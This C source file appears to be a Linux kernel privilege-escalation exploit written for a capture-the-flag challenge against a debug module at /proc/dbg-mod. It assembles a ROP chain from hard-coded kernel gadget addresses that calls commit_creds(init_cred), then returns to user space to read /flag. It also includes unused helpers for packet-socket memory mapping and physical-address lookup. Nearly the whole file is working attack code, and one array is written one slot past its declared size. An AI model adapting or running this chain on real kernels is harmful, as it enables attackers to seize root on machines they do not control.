#define _GNU_SOURCE
#include <sys/resource.h>
#include <sys/sendfile.h>
#include <sys/ioctl.h>
#include <x86intrin.h>
#include <inttypes.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <stdio.h>
#include <fcntl.h>
#include <sched.h>

#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>

#include <arpa/inet.h>
#include <netinet/if_ether.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>

#include <linux/if_packet.h>

typedef uint64_t u64;
typedef uint32_t u32;
typedef uint16_t u16;
typedef uint8_t u8;

typedef int64_t i64;
typedef int32_t i32;
typedef int16_t i16;
typedef int8_t i8;

// mmap on a socket allows us to get a massive amount of consecutive physical memory
// that we can point our forged gsbase at
char *map_pg_vec() {
    struct tpacket_req tp;
    char *ring;

    int fd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_IP));

    tp.tp_block_size = 128 * 0x1000;
    tp.tp_block_nr = 1;
    tp.tp_frame_size = 0x1000;
    tp.tp_frame_nr = 128;
    setsockopt(fd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));

    ring = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ|PROT_WRITE,
                MAP_SHARED|MAP_POPULATE, fd, 0);
    return ring;
}

uint64_t virt2phys(void* p)
{
    uint64_t virt = (uint64_t)p;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1){
        exit(-1);
    }

    uint64_t offset = (virt / 0x1000) * 8;
    lseek(fd, offset, SEEK_SET);

    uint64_t phys;
    if (read(fd, &phys, 8 ) != 8){
    exit(-1);
    }

    phys = (phys & ((1ULL << 54) - 1)) * 0x1000;
    return phys;
}

void pin_cpu(int cpu)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpu, &my_set);
    sched_setaffinity(0, sizeof(my_set), &my_set);
}

// Control flow returns here
void from_kernel() {
    int uid = getuid();
    printf("[from_kernel]: current uid = %d\n", uid);

    char flag[0x20] = {0};
    int flag_fd = open("/flag", O_RDONLY);
    read(flag_fd, flag, sizeof(flag));
    printf("[from_kernel]: got flag = %s\n", flag);

    while (1) {}
}

void orw_thread(int cpu, void *pg_vec, void *physmap_pg_vec, u64 kaslr_base) {
    u64 pop_rsp_ret = (0xffffffff810a6340-0xffffffff81000000)+kaslr_base;
    if (!fork()) {
        pin_cpu(cpu);
        volatile u64 *stack_orw_target = pg_vec + 0x2000 - 0xd0;

        u64 *full_chain_phys = physmap_pg_vec + 0x30100;

        while (1) {
            stack_orw_target[0] = pop_rsp_ret;
            stack_orw_target[1] = (u64)full_chain_phys;
        }
    }
}

int main(int argc, char **argv) {
    u64 kaslr_base = 0xffffffff81000000;

    u32 dbg = open("/proc/dbg-mod", 2);

    // we want this for later
    u64 saved_rsp;
    asm(".intel_syntax noprefix;"
        "mov %0, rsp;"
        ".att_syntax prefix;"
        : "=r"(saved_rsp)
    );

    // ensure rsp is aligned for later
    saved_rsp |= 0x8;

    u64 cli_ret =      (0xffffffff8211ba15-0xffffffff81000000)+kaslr_base;
    u64 swapgs_ret =   (0xffffffff8220130c-0xffffffff81000000)+kaslr_base; // pops rbp
    u64 pop_rdi_ret =  (0xffffffff818cee6c-0xffffffff81000000)+kaslr_base;
    u64 init_cred =    (0xffffffff8328c7e0-0xffffffff81000000)+kaslr_base;
    u64 commit_creds = (0xffffffff81139b20-0xffffffff81000000)+kaslr_base;
    u64 pop_rcx_ret =  (0xffffffff810a0613-0xffffffff81000000)+kaslr_base;
    u64 iretq =        (0xffffffff822018a7-0xffffffff81000000)+kaslr_base;
    u64 popf_ret =     (0xffffffff810b35d0-0xffffffff81000000)+kaslr_base;
    u64 pop_rsp_ret =  (0xffffffff8211b855-0xffffffff81000000)+kaslr_base;
    u64 sysret =       (0xffffffff822001e3-0xffffffff81000000)+kaslr_base;
    u64 pop_r11_ret =  (0xffffffff8157cf21-0xffffffff81000000)+kaslr_base;
    u64 pop_r11_r12_rbp_ret = (0xffffffff810983b2-0xffffffff81000000)+kaslr_base;
    u64 user_rip_target = (u64)from_kernel;
    u64 eflags = 0x46 | 0x00040000;


    u64 full_chain_usr[12];
    full_chain_usr[0] = cli_ret;
    full_chain_usr[1] = pop_rdi_ret;
    full_chain_usr[2] = init_cred;
    full_chain_usr[3] = commit_creds;
    full_chain_usr[4] = swapgs_ret;
    full_chain_usr[5] = saved_rsp; // rbp
    full_chain_usr[6] = pop_rcx_ret;
    full_chain_usr[7] = user_rip_target;
    full_chain_usr[8] = pop_r11_r12_rbp_ret;
    full_chain_usr[9] = 0x246;
    full_chain_usr[10] = 0;
    full_chain_usr[11] = 0;
    full_chain_usr[12] = sysret;

    // full_chain_usr[6] = iretq;
    // full_chain_usr[7] = user_rip_target;
    // full_chain_usr[8] = 0x33;  // cs
    // full_chain_usr[9] = 0x246; // eflags
    // full_chain_usr[10] = saved_rsp;
    // full_chain_usr[11] = 0x2b;  // ss

    u64 chain[4];
    chain[0] = popf_ret;
    chain[1] = eflags;
    chain[2] = pop_rsp_ret;
    chain[3] = (u64)full_chain_usr;

    struct retspill_req {
        char *buf;
        void *target;
    } req;

    req.buf = (char *)chain;
    req.target = (void *)pop_rdi_ret;

    ioctl(dbg, 1342, &req);

    // Control flow continues in from_kernel()

    return 0;
}

